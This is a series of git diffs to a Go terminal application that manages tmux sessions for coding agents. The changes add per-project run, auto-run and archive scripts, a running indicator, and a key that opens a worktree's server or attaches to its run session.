@@ -1042,6 +1054,14 @@ func (m *Model) Update(msg tea.Msg) (tea.Model, tea.Cmd) {
 		m.bannerPhase = 0
 		return m, m.bannerTick()
 
+	case waveTickMsg:
+		m.wavePhase++
+		if !m.anyRunning() {
+			m.waving = false
+			return m, nil
+		}
+		return m, m.waveTick()
+
 	case browserOpenMsg:
 		m.handleBrowserOpen(msg)
 		return m, nil
@@ -1073,6 +1093,16 @@ func (m *Model) Update(msg tea.Msg) (tea.Model, tea.Cmd) {
 			}
 		}
 		m.sessions = msg.sessions
+		m.paneCommands = msg.paneCommands
+		// A run script that started or ended between polls decides whether
+		// the indicator needs a tick at all.
+		wave := tea.Cmd(nil)
+		if m.anyRunning() && !m.waving {
+			m.waving = true
+			wave = m.waveTick()
+		} else if !m.anyRunning() {
+			m.waving = false
+		}
 		m.groups = msg.groups
 		m.groupPaths = msg.groupPaths
 		m.groupWorktrees = msg.groupWorktrees
@@ -1103,7 +1133,7 @@ func (m *Model) Update(msg tea.Msg) (tea.Model, tea.Cmd) {
 		if sess, ok := m.selected(); ok && sess.ID != msg.procFor {
 			m.syncPollInput()
 			m.previewGen++
-			return m, tea.Batch(focusExit, m.previewCmd(sess, m.previewGen), m.diffRefreshCmd())
+			return m, tea.Batch(focusExit, wave, m.previewCmd(sess, m.previewGen), m.diffRefreshCmd())
 		}
 		m.proc = msg.proc
 		m.procFor = msg.procFor

--- a/internal/ui/poller.go
+++ b/internal/ui/poller.go
@@ -209,8 +209,8 @@ func (p *poller) refreshOnce() tea.Msg {
 	}
 	var livePIDs []int
 	for _, sess := range sessions {
-		if !sess.Archived && panes[sess.ID] > 0 {
-			livePIDs = append(livePIDs, panes[sess.ID])
+		if !sess.Archived && panes[sess.ID].PID > 0 {
+			livePIDs = append(livePIDs, panes[sess.ID].PID)
 		}
 	}
 	trees := sysstat.Trees(livePIDs)
@@ -243,7 +243,8 @@ func (p *poller) refreshOnce() tea.Msg {
 			return errMsg{err}
 		}
 		newStatus := status.Dead
-		if pid := panes[sess.ID]; pid > 0 {
+		if pane := panes[sess.ID]; pane.PID > 0 {
+			pid := pane.PID
 			stat := trees[pid]
 			if stat.OK {
 				nextTreeCPU[pid] = stat.CPUSeconds
@@ -317,7 +318,7 @@ func (p *poller) refreshOnce() tea.Msg {
 	}
 	if preview == "" && selectedID != "" {
 		for _, sess := range sessions {
-			if sess.ID == selectedID && (sess.Archived || panes[sess.ID] == 0) {
+			if sess.ID == selectedID && (sess.Archived || panes[sess.ID].PID == 0) {
 				snapshot, err := storedPreview(p.store, p.tmux, sess.ID)
 				if err != nil {
 					return errMsg{err}
@@ -370,6 +371,7 @@ func (p *poller) refreshOnce() tea.Msg {
 		procFor:        selectedID,
 		preview:        preview,
 		agents:         agents,
+		paneCommands:   paneCommands(panes),
 	}
 	if sampleStats {
 		msg.snap = sysstat.Sample("/")
@@ -380,8 +382,8 @@ func (p *poller) refreshOnce() tea.Msg {
 
 // idMinting reports whether a live, not-yet-captured session belongs to a
 // tool that mints its own conversation id.
-func (p *poller) idMinting(sess store.Session, panes map[string]int) bool {
-	return !sess.Archived && panes[sess.ID] != 0 && sess.AgentSessionID == "" &&
+func (p *poller) idMinting(sess store.Session, panes map[string]tmux.Pane) bool {
+	return !sess.Archived && panes[sess.ID].PID != 0 && sess.AgentSessionID == "" &&
 		p.sessionStores[sess.Tool] != ""
 }
 
@@ -391,7 +393,7 @@ func (p *poller) idMinting(sess store.Session, panes map[string]int) bool {
 // including a freshly submitted session's first appearance. One pass runs at
 // a time, on a snapshot, and a pass that captures anything pokes a refresh so
 // the UI and store pick up the new ids.
-func (p *poller) startCaptureIfIdle(sessions []store.Session, panes map[string]int) {
+func (p *poller) startCaptureIfIdle(sessions []store.Session, panes map[string]tmux.Pane) {
 	hasWork := false
 	for _, sess := range sessions {
 		if p.idMinting(sess, panes) {
@@ -424,7 +426,7 @@ func (p *poller) startCaptureIfIdle(sessions []store.Session, panes map[string]i
 // started in the same directory then skips that one via claimed and captures
 // its own. Launch times carry nanosecond precision, so sessions launched a
 // moment apart in the same directory still order deterministically.
-func (p *poller) captureAgentSessionIDs(sessions []store.Session, panes map[string]int) (int, error) {
+func (p *poller) captureAgentSessionIDs(sessions []store.Session, panes map[string]tmux.Pane) (int, error) {
 	claimed := make(map[string]bool, len(sessions))
 	for _, sess := range sessions {
 		if sess.AgentSessionID != "" {
@@ -761,4 +763,15 @@ func (p *poller) notificationsOn() bool {
 func (p *poller) notifyFinished() bool {
 	chosen, err := p.store.Setting(notifyFinishedSetting)
 	return err == nil && chosen == "on"
+}
+
+// paneCommands reduces a poll's pane data to the foreground command per
+// session, which is what tells a shell running something from one resting at
+// a prompt.
+func paneCommands(panes map[string]tmux.Pane) map[string]string {
+	commands := make(map[string]string, len(panes))
+	for id, pane := range panes {
+		commands[id] = pane.Command
+	}
+	return commands
 }

--- a/internal/ui/poller_test.go
+++ b/internal/ui/poller_test.go
@@ -11,6 +11,7 @@ import (
 	"github.com/YoanWai/agent-manager/internal/hooks"
 	"github.com/YoanWai/agent-manager/internal/status"
 	"github.com/YoanWai/agent-manager/internal/store"
+	"github.com/YoanWai/agent-manager/internal/tmux"
 	tea "github.com/charmbracelet/bubbletea"
 	"github.com/charmbracelet/x/ansi"
 )
@@ -786,7 +787,7 @@ func TestCaptureAgentSessionIDsAssignsInLaunchOrder(t *testing.T) {
 
 	sessions := []store.Session{sessB, sessA} // store order, not launch order
 	p := &poller{store: st, sessionStores: map[string]string{"codex": "codex"}}
-	panes := map[string]int{"sess-A": 123, "sess-B": 456}
+	panes := map[string]tmux.Pane{"sess-A": {PID: 123}, "sess-B": {PID: 456}}
 	captured, err := p.captureAgentSessionIDs(sessions, panes)
 	if err != nil {
 		t.Fatal(err)
@@ -845,7 +846,7 @@ func TestCaptureAgentSessionIDsSkipsARetiredConversation(t *testing.T) {
 	}
 
 	p := &poller{store: st, sessionStores: map[string]string{"codex": "codex"}}
-	if _, err := p.captureAgentSessionIDs([]store.Session{sess}, map[string]int{"sess": 42}); err != nil {
+	if _, err := p.captureAgentSessionIDs([]store.Session{sess}, map[string]tmux.Pane{"sess": {PID: 42}}); err != nil {
 		t.Fatal(err)
 	}
 	got, err := st.Get("sess")
@@ -888,7 +889,7 @@ func TestCaptureAgentSessionIDsDropsAnAnswerARestartOutran(t *testing.T) {
 	}
 
 	p := &poller{store: st, sessionStores: map[string]string{"codex": "codex"}}
-	captured, err := p.captureAgentSessionIDs([]store.Session{snapshot}, map[string]int{"sess": 7})
+	captured, err := p.captureAgentSessionIDs([]store.Session{snapshot}, map[string]tmux.Pane{"sess": {PID: 7}})
 	if err != nil {
 		t.Fatal(err)
 	}

--- a/internal/ui/run.go
+++ b/internal/ui/run.go
@@ -47,8 +47,7 @@ func (m *Model) runKey() (tea.Model, tea.Cmd) {
 	// A file with no run scripts is a dead end otherwise: the reader has
 	// already opted in, and what they need is the file open.
 	if len(settings.Run) == 0 {
-		m.reportDone(runSetupHint(settings))
-		return m.openInEditor(project.SettingsPath(settings.Root))
+		return m.openSettingsFile(settings, runSetupHint(settings))
 	}
 	if name, ok := settings.DefaultRun(); ok {
 		return m.startRun(settings, dir, name)
@@ -64,6 +63,20 @@ func (m *Model) runKey() (tea.Model, tea.Cmd) {
 func runSetupHint(settings project.Settings) string {
 	return "no run scripts in " + project.SettingsPath(settings.Root) +
 		": add a [run.dev] block with a command"
+}
+
+// openSettingsFile opens a project's settings and says why, keeping the
+// reason on the status bar when there turns out to be no editor to open it
+// with. The reason carries the path, which is the half a reader on such a
+// machine actually needs; an editor failure alone would leave them knowing
+// only that nothing happened.
+func (m *Model) openSettingsFile(settings project.Settings, reason string) (tea.Model, tea.Cmd) {
+	m.reportDone(reason)
+	model, cmd := m.openInEditor(project.SettingsPath(settings.Root))
+	if !m.errBar.worked() {
+		m.errBar.text = reason + " — " + m.errBar.text
+	}
+	return model, cmd
 }
 
 // runInitState is the offer to give a project its first settings file: where

--- a/internal/ui/run.go
+++ b/internal/ui/run.go
@@ -33,7 +33,7 @@ func (m *Model) runKey() (tea.Model, tea.Cmd) {
 		m.errBar.text = "no directory to run in: " + dir
 		return m, nil
 	}
-	settings, err := project.Load(dir)
+	settings, err := project.Load(dir, m.repoRootOf(dir))
 	if err != nil {
 		m.errBar.text = err.Error()
 		return m, nil
@@ -118,19 +118,37 @@ func (m *Model) startRun(settings project.Settings, dir, name string) (tea.Model
 // first time anyone tries this. Falling back to the repository the worktree
 // branched from makes that first attempt work instead of silently doing
 // nothing.
+// Both reads are bounded by the tree they read: a worktree is its own git
+// toplevel, so neither lookup can climb out of the repository into a
+// directory whose settings would be someone else's shell commands.
 func (m *Model) projectSettings(worktreeDir, repoRoot string) (project.Settings, error) {
-	settings, err := project.Load(worktreeDir)
+	settings, err := project.Load(worktreeDir, worktreeDir)
 	if err != nil {
 		return project.Settings{}, err
 	}
 	if settings.Found || repoRoot == "" {
 		return settings, nil
 	}
-	uncommitted, err := project.Load(repoRoot)
+	uncommitted, err := project.Load(repoRoot, repoRoot)
 	if err != nil {
 		return project.Settings{}, err
 	}
 	return uncommitted, nil
+}
+
+// repoRootOf is the repository a directory belongs to, and so how far up
+// settings discovery may walk from it. A directory outside any repository
+// bounds the walk to itself, which is the safe reading: nothing above a
+// loose directory is a project of the user's.
+func (m *Model) repoRootOf(dir string) string {
+	if m.gitDrv == nil {
+		return dir
+	}
+	root, err := m.gitDrv.RepoRoot(dir)
+	if err != nil || root == "" {
+		return dir
+	}
+	return root
 }
 
 // portKey is what a directory's port is derived from: the worktree's own

--- a/internal/ui/run.go
+++ b/internal/ui/run.go
@@ -1,0 +1,199 @@
+package ui
+
+import (
+	"fmt"
+	"path/filepath"
+	"strconv"
+	"strings"
+
+	"github.com/YoanWai/agent-manager/internal/project"
+	"github.com/YoanWai/agent-manager/internal/status"
+	"github.com/YoanWai/agent-manager/internal/store"
+	tea "github.com/charmbracelet/bubbletea"
+	"github.com/charmbracelet/lipgloss"
+)
+
+// runPickState is the picker p opens when a project declares more than one
+// run script and none of them is the default. Rows are snapshotted at open
+// so a settings file edited underneath cannot reorder them under the cursor.
+type runPickState struct {
+	names    []string
+	settings project.Settings
+	dir      string
+	cursor   int
+}
+
+// runKey starts a project's run script in a terminal tab beside the session
+// it belongs to. One script, or one marked default, starts straight away;
+// anything ambiguous opens the picker rather than guessing, because the
+// wrong script here starts a server or a test watcher, not a no-op.
+func (m *Model) runKey() (tea.Model, tea.Cmd) {
+	dir, ok := m.rowDir()
+	if !ok {
+		m.errBar.text = "no directory to run in: " + dir
+		return m, nil
+	}
+	settings, err := project.Load(dir)
+	if err != nil {
+		m.errBar.text = err.Error()
+		return m, nil
+	}
+	if len(settings.Run) == 0 {
+		m.errBar.text = runSetupHint(settings)
+		return m, nil
+	}
+	if name, ok := settings.DefaultRun(); ok {
+		return m.startRun(settings, dir, name)
+	}
+	m.runPick = runPickState{names: settings.RunNames(), settings: settings, dir: dir}
+	m.mode = modeRunPick
+	m.errBar.text = ""
+	return m, nil
+}
+
+// runSetupHint says what to write and where, naming the file rather than the
+// feature: a project with no run scripts is the common case on first press,
+// and the error is the only documentation the user is looking at.
+func runSetupHint(settings project.Settings) string {
+	where := filepath.Join(project.Dir, project.File)
+	if settings.Found {
+		where = filepath.Join(settings.Root, project.Dir, project.File)
+		return "no run scripts in " + where + `: add a [run.dev] block with a command`
+	}
+	return "no " + where + " in this repo: add one with a [run.dev] block to run a project command here"
+}
+
+// startRun spawns the script as a terminal tab. It is a shell session like
+// the one T opens, so it lands in the list with its own row, keeps its
+// scrollback, and is killed, revived and archived by the same keys. The
+// port is exported rather than substituted into the command so a script can
+// use it or ignore it without agent-manager parsing shell syntax.
+func (m *Model) startRun(settings project.Settings, dir, name string) (tea.Model, tea.Cmd) {
+	run, ok := settings.Run[name]
+	if !ok {
+		m.errBar.text = "no run script named " + name
+		return m, nil
+	}
+	toolName, tool, ok := m.shellTool()
+	if !ok {
+		m.errBar.text = `no shell configured: add a tool block with shell = true to config.toml`
+		return m, nil
+	}
+	// Named for the session it runs beside, so several worktrees running the
+	// same script stay tellable apart in the list.
+	label := name
+	if entry, ok := m.selectedRow(); ok && !entry.isGroup {
+		label = name + "-" + entry.sess.Name
+	}
+	port := settings.Port(portKey(dir))
+	sess := store.Session{
+		ID:     newID(),
+		Name:   label,
+		Tool:   toolName,
+		Cwd:    dir,
+		Group:  m.contextGroup(),
+		Status: status.Starting,
+	}
+	if err := m.launchNewSession(sess, tool, run.Command, launchOptions{
+		env: map[string]string{project.EnvPort: strconv.Itoa(port)},
+	}); err != nil {
+		m.errBar.text = err.Error()
+		return m, nil
+	}
+	// Starting sits outside the attention set, so the row the key just made
+	// would be filtered off screen.
+	m.statusFilter = statusFilterAll
+	m.errBar.text = ""
+	m.mode = modeList
+	m.focusSession(sess.ID)
+	return m, m.refreshCmd()
+}
+
+// projectSettings reads the settings governing a freshly created worktree.
+//
+// The worktree comes first, so settings are versioned with the branch and a
+// branch that changes its own setup script gets the new one. It is a
+// checkout of a commit, though, and a settings file written but not yet
+// committed is not in it — which is exactly the state a project is in the
+// first time anyone tries this. Falling back to the repository the worktree
+// branched from makes that first attempt work instead of silently doing
+// nothing.
+func (m *Model) projectSettings(worktreeDir, repoRoot string) (project.Settings, error) {
+	settings, err := project.Load(worktreeDir)
+	if err != nil {
+		return project.Settings{}, err
+	}
+	if settings.Found || repoRoot == "" {
+		return settings, nil
+	}
+	uncommitted, err := project.Load(repoRoot)
+	if err != nil {
+		return project.Settings{}, err
+	}
+	return uncommitted, nil
+}
+
+// portKey is what a directory's port is derived from: the worktree's own
+// directory name, so every session working in that worktree — the agent, the
+// dev server, a second shell — resolves to the same port, and a worktree
+// keeps it across restarts.
+func portKey(dir string) string {
+	return filepath.Base(dir)
+}
+
+func (m *Model) handleRunPickKey(msg tea.KeyMsg) (tea.Model, tea.Cmd) {
+	switch msg.String() {
+	case "esc", "q", "ctrl+c":
+		m.mode = modeList
+		return m, nil
+	case "up", "k":
+		if m.runPick.cursor > 0 {
+			m.runPick.cursor--
+		}
+	case "down", "j":
+		if m.runPick.cursor < len(m.runPick.names)-1 {
+			m.runPick.cursor++
+		}
+	case "enter":
+		if m.runPick.cursor < len(m.runPick.names) {
+			return m.startRun(m.runPick.settings, m.runPick.dir, m.runPick.names[m.runPick.cursor])
+		}
+	}
+	return m, nil
+}
+
+func (m *Model) viewRunPick() string {
+	var b strings.Builder
+	for i, name := range m.runPick.names {
+		marker := "  "
+		labelStyle := valueStyle
+		if m.runPick.cursor == i {
+			marker = lipgloss.NewStyle().Foreground(colorAccent).Render("❯ ")
+			labelStyle = lipgloss.NewStyle().Foreground(colorAccent).Bold(true)
+		}
+		// The command is the description when the project wrote none: a run
+		// script is picked by what it does, and its command says that.
+		note := m.runPick.settings.Run[name].Description
+		if note == "" {
+			note = m.runPick.settings.Run[name].Command
+		}
+		b.WriteString(marker)
+		b.WriteString(labelStyle.Render(name))
+		b.WriteString(mutedStyle.Render("  " + firstLine(note)))
+		b.WriteByte('\n')
+	}
+	port := m.runPick.settings.Port(portKey(m.runPick.dir))
+	b.WriteByte('\n')
+	b.WriteString(subtleStyle.Render(fmt.Sprintf("  %s=%d", project.EnvPort, port)))
+	hint := [][2]string{{"↑↓", "move"}, {"↵", "run"}, {"esc", "back"}}
+	return m.card("▶ Run", strings.TrimRight(b.String(), "\n"), hint)
+}
+
+// firstLine keeps a multi-line command from breaking the picker's layout.
+func firstLine(s string) string {
+	line, _, cut := strings.Cut(strings.TrimSpace(s), "\n")
+	if cut {
+		return line + " …"
+	}
+	return line
+}

--- a/internal/ui/run.go
+++ b/internal/ui/run.go
@@ -169,6 +169,8 @@ func (m *Model) startRun(settings project.Settings, dir, name string) (tea.Model
 	if entry, ok := m.selectedRow(); ok && !entry.isGroup {
 		label = name + "-" + entry.sess.Name
 	}
+	// Probed before the script starts, or its own server is what we find.
+	busy := settings.BlockBusy(portKey(dir))
 	sess := store.Session{
 		ID:     newID(),
 		Name:   label,
@@ -186,7 +188,18 @@ func (m *Model) startRun(settings project.Settings, dir, name string) (tea.Model
 	// Starting sits outside the attention set, so the row the key just made
 	// would be filtered off screen.
 	m.statusFilter = statusFilterAll
-	m.errBar.text = ""
+	// The port is the one thing the reader wanted and could not otherwise
+	// see: the row shows a name, the preview shows output, and neither says
+	// which of the worktrees' ports this one got.
+	port := settings.Port(portKey(dir))
+	message := fmt.Sprintf("running %s on :%d · O opens it", name, port)
+	if busy {
+		// Said plainly rather than worked around: a server failing to bind a
+		// port you can see beats one quietly serving somewhere you cannot.
+		message = fmt.Sprintf("running %s on :%d · something is already listening there",
+			name, port)
+	}
+	m.reportDone(message)
 	m.mode = modeList
 	m.focusSession(sess.ID)
 	return m, m.refreshCmd()
@@ -317,4 +330,36 @@ func (m *Model) writeGroupSettings(path string) (string, error) {
 		return "", nil
 	}
 	return project.Write(m.repoRootOf(path), setup, run)
+}
+
+// openKey opens the worktree's own server in a browser, so starting one and
+// looking at it are one keystroke apart rather than a port the reader has to
+// find first. o opens the directory in an editor; O opens what it serves.
+//
+// A port with nothing on it is reported rather than opened: a browser error
+// page says nothing about which of the two things went wrong.
+func (m *Model) openKey() (tea.Model, tea.Cmd) {
+	dir, ok := m.rowDir()
+	if !ok {
+		m.errBar.text = "no directory to open a server for: " + dir
+		return m, nil
+	}
+	settings, err := project.Load(dir, m.repoRootOf(dir))
+	if err != nil {
+		m.errBar.text = err.Error()
+		return m, nil
+	}
+	if !settings.Found {
+		m.errBar.text = "no project settings here: press p to create them"
+		return m, nil
+	}
+	name := portKey(dir)
+	port := settings.Port(name)
+	if !project.Listening(port) {
+		m.errBar.text = fmt.Sprintf("nothing listening on :%d — press p to start a run script", port)
+		return m, nil
+	}
+	url := settings.URL(name)
+	m.reportDone("opening " + url)
+	return m, openLink(url)
 }

--- a/internal/ui/run.go
+++ b/internal/ui/run.go
@@ -332,16 +332,20 @@ func (m *Model) writeGroupSettings(path string) (string, error) {
 	return project.Write(m.repoRootOf(path), setup, run)
 }
 
-// openKey opens the worktree's own server in a browser, so starting one and
-// looking at it are one keystroke apart rather than a port the reader has to
-// find first. o opens the directory in an editor; O opens what it serves.
+// openKey shows whatever this worktree is currently running, which is two
+// different things depending on the project and should not be two keys.
 //
-// A port with nothing on it is reported rather than opened: a browser error
-// page says nothing about which of the two things went wrong.
+// A worktree serving HTTP opens in a browser. One running a TUI — this
+// manager testing a build of itself is the case that prompted it — has
+// nothing to open in a browser, so its pane takes the terminal instead.
+// Neither needs configuring: what is running is a fact that can be observed,
+// so it is, rather than being asked about in the settings file.
+//
+// o opens the worktree's directory in an editor; O opens what it is doing.
 func (m *Model) openKey() (tea.Model, tea.Cmd) {
 	dir, ok := m.rowDir()
 	if !ok {
-		m.errBar.text = "no directory to open a server for: " + dir
+		m.errBar.text = "no directory to open anything for: " + dir
 		return m, nil
 	}
 	settings, err := project.Load(dir, m.repoRootOf(dir))
@@ -353,13 +357,52 @@ func (m *Model) openKey() (tea.Model, tea.Cmd) {
 		m.errBar.text = "no project settings here: press p to create them"
 		return m, nil
 	}
+	// Serving wins over the pane: a project with both a server and a pane
+	// full of its log is one whose interesting half is in the browser.
 	name := portKey(dir)
-	port := settings.Port(name)
-	if !project.Listening(port) {
-		m.errBar.text = fmt.Sprintf("nothing listening on :%d — press p to start a run script", port)
-		return m, nil
+	if port := settings.Port(name); project.Listening(port) {
+		url := settings.URL(name)
+		m.reportDone("opening " + url)
+		return m, openLink(url)
 	}
-	url := settings.URL(name)
-	m.reportDone("opening " + url)
-	return m, openLink(url)
+	if sess, ok := m.runSessionIn(dir); ok {
+		m.focusSession(sess.ID)
+		m.reportDone("attaching to " + sess.Name)
+		return m, m.attachCmd(sess.ID)
+	}
+	m.errBar.text = fmt.Sprintf(
+		"nothing running here: no server on :%d and no run session — press p to start one",
+		settings.Port(name))
+	return m, nil
+}
+
+// runSessionIn finds the live run session working in a directory: the shell
+// sessions p creates, newest first, so a script started twice opens the one
+// still meant to be looked at. Directories are compared resolved, since a
+// pane reports its path with symlinks followed and the row may not.
+func (m *Model) runSessionIn(dir string) (store.Session, bool) {
+	want := resolvePath(dir)
+	var found store.Session
+	for _, sess := range m.sessions {
+		if sess.Archived || !m.isShell(sess.Tool) {
+			continue
+		}
+		if resolvePath(sess.Cwd) != want || !m.tmux.Exists(sess.ID) {
+			continue
+		}
+		if found.ID == "" || sess.CreatedAt.After(found.CreatedAt) {
+			found = sess
+		}
+	}
+	return found, found.ID != ""
+}
+
+// resolvePath follows symlinks where it can. A tmux pane reports its
+// directory with symlinks already followed while a stored Cwd may not, so
+// the two only compare equal once both are put through this.
+func resolvePath(path string) string {
+	if real, err := filepath.EvalSymlinks(path); err == nil {
+		return real
+	}
+	return path
 }

--- a/internal/ui/run.go
+++ b/internal/ui/run.go
@@ -3,7 +3,6 @@ package ui
 import (
 	"fmt"
 	"path/filepath"
-	"strconv"
 	"strings"
 
 	"github.com/YoanWai/agent-manager/internal/project"
@@ -45,9 +44,11 @@ func (m *Model) runKey() (tea.Model, tea.Cmd) {
 	if !settings.Found {
 		return m.openRunInit(dir)
 	}
+	// A file with no run scripts is a dead end otherwise: the reader has
+	// already opted in, and what they need is the file open.
 	if len(settings.Run) == 0 {
-		m.errBar.text = runSetupHint(settings)
-		return m, nil
+		m.reportDone(runSetupHint(settings))
+		return m.openInEditor(project.SettingsPath(settings.Root))
 	}
 	if name, ok := settings.DefaultRun(); ok {
 		return m.startRun(settings, dir, name)
@@ -155,7 +156,6 @@ func (m *Model) startRun(settings project.Settings, dir, name string) (tea.Model
 	if entry, ok := m.selectedRow(); ok && !entry.isGroup {
 		label = name + "-" + entry.sess.Name
 	}
-	port := settings.Port(portKey(dir))
 	sess := store.Session{
 		ID:     newID(),
 		Name:   label,
@@ -165,7 +165,7 @@ func (m *Model) startRun(settings project.Settings, dir, name string) (tea.Model
 		Status: status.Starting,
 	}
 	if err := m.launchNewSession(sess, tool, run.Command, launchOptions{
-		env: map[string]string{project.EnvPort: strconv.Itoa(port)},
+		env: settings.Env(portKey(dir)),
 	}); err != nil {
 		m.errBar.text = err.Error()
 		return m, nil
@@ -242,6 +242,11 @@ func (m *Model) handleRunPickKey(msg tea.KeyMsg) (tea.Model, tea.Cmd) {
 		if m.runPick.cursor < len(m.runPick.names)-1 {
 			m.runPick.cursor++
 		}
+	case "e":
+		// The picker is where a reader stands when they notice a command is
+		// wrong, so it is where the file that holds it should open from.
+		m.mode = modeList
+		return m.openInEditor(project.SettingsPath(m.runPick.settings.Root))
 	case "enter":
 		if m.runPick.cursor < len(m.runPick.names) {
 			return m.startRun(m.runPick.settings, m.runPick.dir, m.runPick.names[m.runPick.cursor])
@@ -273,7 +278,7 @@ func (m *Model) viewRunPick() string {
 	port := m.runPick.settings.Port(portKey(m.runPick.dir))
 	b.WriteByte('\n')
 	b.WriteString(subtleStyle.Render(fmt.Sprintf("  %s=%d", project.EnvPort, port)))
-	hint := [][2]string{{"↑↓", "move"}, {"↵", "run"}, {"esc", "back"}}
+	hint := [][2]string{{"↑↓", "move"}, {"↵", "run"}, {"e", "edit"}, {"esc", "back"}}
 	return m.card("▶ Run", strings.TrimRight(b.String(), "\n"), hint)
 }
 
@@ -284,4 +289,19 @@ func firstLine(s string) string {
 		return line + " …"
 	}
 	return line
+}
+
+// writeGroupSettings turns what the group form was told about the project
+// into its settings file, and reports the path when one was written.
+//
+// Nothing is written for a project that already has settings, or when both
+// fields were left empty: the form asks about the project, and a reader who
+// answered neither question has not asked for a file.
+func (m *Model) writeGroupSettings(path string) (string, error) {
+	setup := strings.TrimSpace(m.groupForm.setup.Value())
+	run := strings.TrimSpace(m.groupForm.run.Value())
+	if m.groupForm.settingsExist || (setup == "" && run == "") {
+		return "", nil
+	}
+	return project.Write(m.repoRootOf(path), setup, run)
 }

--- a/internal/ui/run.go
+++ b/internal/ui/run.go
@@ -1,9 +1,14 @@
 package ui
 
 import (
+	"context"
 	"fmt"
+	"os"
+	"os/exec"
 	"path/filepath"
+	"sort"
 	"strings"
+	"time"
 
 	"github.com/YoanWai/agent-manager/internal/project"
 	"github.com/YoanWai/agent-manager/internal/status"
@@ -405,4 +410,147 @@ func resolvePath(path string) string {
 		return real
 	}
 	return path
+}
+
+// autoRunWait caps how long an auto-run script waits on the setup marker. A
+// setup that installs a large dependency tree is slow but finite; one that
+// is never going to finish should not leave a pane spinning for the rest of
+// the session.
+const autoRunWait = 15 * time.Minute
+
+// startAutoRuns launches the scripts a project marked auto, for a worktree
+// that has just been created. Failures are reported and the rest still
+// start: one server refusing to come up is not a reason to withhold the
+// others.
+func (m *Model) startAutoRuns(settings project.Settings, dir, group string) {
+	names := settings.AutoRuns()
+	if len(names) == 0 {
+		return
+	}
+	toolName, tool, ok := m.shellTool()
+	if !ok {
+		m.errBar.text = `no shell configured: add a tool block with shell = true to config.toml`
+		return
+	}
+	marker := ""
+	if strings.TrimSpace(settings.Setup) != "" {
+		marker = project.SetupMarker(dir)
+	}
+	for _, name := range names {
+		command := project.WaitForSetup(marker, settings.Run[name].Command, autoRunWait)
+		sess := store.Session{
+			ID:     newID(),
+			Name:   name + "-" + filepath.Base(dir),
+			Tool:   toolName,
+			Cwd:    dir,
+			Group:  group,
+			Status: status.Starting,
+		}
+		if err := m.launchNewSession(sess, tool, command, launchOptions{
+			env: settings.Env(portKey(dir)),
+		}); err != nil {
+			m.errBar.text = "auto-run " + name + ": " + err.Error()
+		}
+	}
+}
+
+// archiveWorktree runs a project's archive script in a worktree that is
+// about to be removed, for whatever its setup created outside it — a
+// database, a container, a tunnel. Git takes the directory away; nothing
+// else knows to.
+//
+// Run synchronously, since the directory it needs is about to stop existing,
+// and capped by a timeout so a script that hangs cannot take the manager
+// with it. A failure is reported and removal continues: the resources have
+// leaked either way, and refusing to delete the session the reader asked to
+// delete would only add a second problem.
+func (m *Model) archiveWorktree(dir, repoRoot string) {
+	settings, err := m.projectSettings(dir, repoRoot)
+	if err != nil || strings.TrimSpace(settings.Archive) == "" {
+		return
+	}
+	ctx, cancel := context.WithTimeout(context.Background(), archiveTimeout)
+	defer cancel()
+	cmd := exec.CommandContext(ctx, "sh", "-c", settings.Archive)
+	cmd.Dir = dir
+	cmd.Env = append(os.Environ(), envPairs(settings.Env(portKey(dir)))...)
+	out, err := cmd.CombinedOutput()
+	switch {
+	case ctx.Err() != nil:
+		m.errBar.text = "archive script timed out after " + archiveTimeout.String()
+	case err != nil:
+		m.errBar.text = "archive script failed: " + firstLine(string(out))
+	}
+}
+
+// archiveTimeout is long enough for a container to stop and short enough
+// that a wedged script is noticed rather than waited on.
+const archiveTimeout = 2 * time.Minute
+
+func envPairs(env map[string]string) []string {
+	pairs := make([]string, 0, len(env))
+	for key, value := range env {
+		pairs = append(pairs, key+"="+value)
+	}
+	sort.Strings(pairs)
+	return pairs
+}
+
+// waveFrames is the run indicator: a single cell rising and falling, so a
+// script that is still going reads as alive at a glance. One column wide so
+// it sits in the glyph the row already has rather than taking space from the
+// name, and short enough that the whole cycle is legible.
+var waveFrames = []rune{'▁', '▂', '▄', '▆', '█', '▆', '▄', '▂'}
+
+// waveInterval is how often the indicator advances. Fast enough to read as
+// motion, slow enough that a repaint every tick is nothing: the frame is
+// rebuilt from data already in memory, with no tmux call behind it.
+const waveInterval = 180 * time.Millisecond
+
+type waveTickMsg struct{}
+
+// waveTick keeps the indicator moving only while something is running. A
+// manager with no live run script schedules nothing, so an idle session
+// costs exactly what it did before this existed.
+func (m *Model) waveTick() tea.Cmd {
+	if !m.anyRunning() {
+		return nil
+	}
+	return tea.Tick(waveInterval, func(time.Time) tea.Msg { return waveTickMsg{} })
+}
+
+// anyRunning reports whether any listed shell session has something in its
+// pane other than the shell itself.
+func (m *Model) anyRunning() bool {
+	for _, sess := range m.sessions {
+		if !sess.Archived && m.sessionRunning(sess) {
+			return true
+		}
+	}
+	return false
+}
+
+// sessionRunning reports whether a shell session is executing something
+// rather than sitting at a prompt. A shell has no turns for the status
+// engine to track, so the foreground command is the only signal there is.
+func (m *Model) sessionRunning(sess store.Session) bool {
+	if !m.isShell(sess.Tool) {
+		return false
+	}
+	command := m.paneCommands[sess.ID]
+	if command == "" {
+		return false
+	}
+	return !isShellCommand(command)
+}
+
+// isShellCommand recognizes a pane resting at a prompt. Matched by name
+// rather than against $SHELL, since the pane may be running a different one
+// than the manager was started from.
+func isShellCommand(command string) bool {
+	switch strings.TrimPrefix(command, "-") {
+	case "sh", "bash", "zsh", "fish", "dash", "ksh", "csh", "tcsh", "ash", "nu", "elvish", "xonsh":
+		return true
+	}
+	return false
 }

--- a/internal/ui/run.go
+++ b/internal/ui/run.go
@@ -38,6 +38,13 @@ func (m *Model) runKey() (tea.Model, tea.Cmd) {
 		m.errBar.text = err.Error()
 		return m, nil
 	}
+	// Nothing to run because the project has never been told how. Offering to
+	// write the file beats an error naming a path the reader then has to
+	// leave the manager to create: p is where they already are when they
+	// discover the feature.
+	if !settings.Found {
+		return m.openRunInit(dir)
+	}
 	if len(settings.Run) == 0 {
 		m.errBar.text = runSetupHint(settings)
 		return m, nil
@@ -52,15 +59,78 @@ func (m *Model) runKey() (tea.Model, tea.Cmd) {
 }
 
 // runSetupHint says what to write and where, naming the file rather than the
-// feature: a project with no run scripts is the common case on first press,
-// and the error is the only documentation the user is looking at.
+// feature: the error is the only documentation the reader is looking at.
 func runSetupHint(settings project.Settings) string {
-	where := filepath.Join(project.Dir, project.File)
-	if settings.Found {
-		where = filepath.Join(settings.Root, project.Dir, project.File)
-		return "no run scripts in " + where + `: add a [run.dev] block with a command`
+	return "no run scripts in " + project.SettingsPath(settings.Root) +
+		": add a [run.dev] block with a command"
+}
